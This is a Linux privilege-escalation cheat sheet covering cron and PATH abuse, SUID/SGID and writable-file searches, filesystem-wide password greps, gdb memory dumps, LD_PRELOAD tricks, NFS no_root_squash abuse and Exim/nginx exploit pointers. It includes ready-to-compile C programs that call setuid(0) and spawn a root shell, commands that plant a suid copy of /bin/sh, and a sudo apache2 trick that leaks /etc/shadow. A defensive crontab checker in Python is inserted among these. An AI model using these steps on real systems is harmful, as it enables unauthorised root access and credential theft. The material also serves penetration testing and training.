Privilege Escalation

Enumeration

Metasploit

post/multi/recon/local_exploit_suggester

Crontab

System-level file location: /etc/crontabs

$PATH redefinition: when a crontab sets its own PATH, a bare command name is resolved against the listed directories from left to right, so a file found in the left-most directory takes precedence in the search order.

File overwrite / file missing: scripts referenced by a cron job that are writable, or that are absent from the location they are called from.

```bash
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
```

Spot short-lived (periodic) processes by diffing the process list every second:

```bash
#!/bin/bash

# Split only on newlines so each process command line stays one item
IFS=$'\n'

old_process=$(ps -eo command)

while true; do
    new_process=$(ps -eo command)
    # Print processes that appeared (>) or disappeared (<) since the last sample
    diff <(echo "$old_process") <(echo "$new_process")
    sleep 1
    old_process=$new_process
done
```
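As an added hardening check (not code from the original page), the script below parses a system crontab, follows each PATH= redefinition in order, and reports root jobs whose bare command name would be resolved through a directory writable by other users before the real binary is found, so the permissions can be fixed or the job changed to an absolute path. The crontab text is a constructed sample, the system-crontab format (with a user field) and cron's default PATH of /usr/bin:/bin are assumptions, and the filesystem probes are injectable so the check also runs offline.

```python
import os
import re
import stat

# Constructed sample in system-crontab format (user field); not from a real host.
CONSTRUCTED_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin:/opt/tools/bin
*/5 * * * * root backup.sh --quiet
30 3 * * * root cleanup-tmp
PATH=/opt/tools/bin:/usr/bin:/bin
@daily root cleanup-tmp
"""

def dir_writable_by_others(path):
    """World-writable without the sticky bit, or group-writable by a non-root group."""
    try:
        st = os.stat(path)
    except OSError:
        return False  # missing directory: nothing can be planted there yet
    world = st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX
    return bool(world or (st.st_mode & stat.S_IWGRP and st.st_gid != 0))

def parse_jobs(text):
    """Yield (path_dirs, user, command) per job; a PATH= line applies to the jobs below it."""
    path_dirs = ["/usr/bin", "/bin"]  # cron's default when PATH is unset (assumption)
    for raw in text.splitlines():
        line = raw.strip()
        if re.match(r"[A-Za-z_][A-Za-z0-9_]*\s*=", line):
            key, _, value = line.partition("=")
            if key.strip() == "PATH":
                path_dirs = value.strip().strip("\"'").split(":")
        elif line and not line.startswith("#"):
            # "@daily user cmd" has 3 fields; "m h dom mon dow user cmd" has 7.
            fields = line.split(None, 2 if line.startswith("@") else 6)
            if len(fields) >= 3:
                yield path_dirs, fields[-2], fields[-1]

def shadowable_jobs(text, writable=dir_writable_by_others, exists=os.path.exists):
    """Return [(user, exe, dir)] for jobs whose bare command name is searched through a
    directory writable by others before the real binary; writable/exists are injectable."""
    findings = []
    for path_dirs, user, command in parse_jobs(text):
        exe = command.split()[0]
        for d in ([] if "/" in exe else path_dirs):  # explicit path skips PATH; left-most wins
            if writable(d):
                findings.append((user, exe, d))
                break
            if exists(os.path.join(d, exe)):
                break  # genuine binary is found first; nothing can shadow it
    return findings
```

Run `shadowable_jobs(open("/etc/crontab").read())` on a live host to use the real stat and path checks; every reported directory is one where a non-root user could place a file that root's cron job would execute.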

Tricks

```bash
su root                  # credential reuse
sudo -u <user> bash -i
ls -lahR /home
# Trace a binary's file accesses to spot files or libraries it looks for but cannot find
strace <executable_file> 2>&1 | grep -i -E "open|access|no such file"
```

DLL (shared library, .so) to compile

Startup scripts

```bash
find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'   # world-writable files
```

Rights on files

```bash
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - runs as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - runs as the owner, not the user who started it
find / -perm -777 -type f 2>/dev/null    # Open permissions
```

Writable files for user or group

```bash
find / -perm /u=w -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -type f -user `whoami` 2>/dev/null
find / -perm /u+w -user `whoami` 2>/dev/null
```

Writable directories for user or group

```bash
find / -perm /u=w -type d -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -type d -user `whoami` 2>/dev/null
```

Password Mining

```bash
history
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
ls -l /etc/passwd
ls -l /etc/shadow
grep -RiIn passw / 2>/dev/null
grep -rnw '/' -ie 'pass' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASS' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASSWORD' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_USER' --color=always 2>/dev/null | grep -vi binary
# Dump a running process's memory with gdb (the two lines after gdb -p are gdb commands)
gdb -p <pid>
info proc mappings
dump memory <out_file> <start_mem_region> <stop_mem_region>
```

LD_PRELOAD / LD_LIBRARY_PATH

Detection

```bash
sudo -l   # look for env_keep+=LD_PRELOAD (or LD_LIBRARY_PATH) in the sudoers output
```

Exploitation

1) Set LD_PRELOAD to point to the .so file
2) sudo LD_PRELOAD=<full_path_to_so_file> <program>

C file to compile into a .so

SetUID

```c
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
```

```c
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    setuid(0);
    execl("/bin/sh", "sh", (char *)NULL);   /* the argument list must end with a NULL pointer */
    return 0;
}
```

```bash
gcc -o root root.c
chown root:root /var/tmp/root && chmod 4777 /var/tmp/root
cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p   # -p keeps the effective uid instead of dropping it
```

Specific vulnerabilities

Dirty c0w

Sudo on apache2

```bash
apache2 -f /etc/shadow   # run through sudo; the config parse error echoes the first line of the file
```

MySQL

Exim

Detection

```bash
dpkg -l | grep -i exim          # vulnerable versions: < 4.86.2
exim -bV -v | grep -i perl      # check whether Exim was compiled with Perl support
head /etc/exim.conf             # look for the perl_startup option
```

Exploitation

exploit/unix/local/exim_perl_startup

CVE-2016-1247

Detection

```bash
dpkg -l   # compare the installed nginx package version against the advisory below
```

Exploit

https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

NFS

Detection

```bash
cat /etc/exports   # look for exports with the no_root_squash option
```

If /etc/exports is writable, no_root_squash can be added to an export.

Exploitation

1) Mount the NFS export on the local Linux system
2) As root (on the localhost), compile an executable and place it in the mounted directory
3) Set 'suid' permissions on the executable
4) Run the file on the NFS server

```bash
showmount -e <ip>
chown root:root sid-shell; chmod +s sid-shell
```

Resources and Tools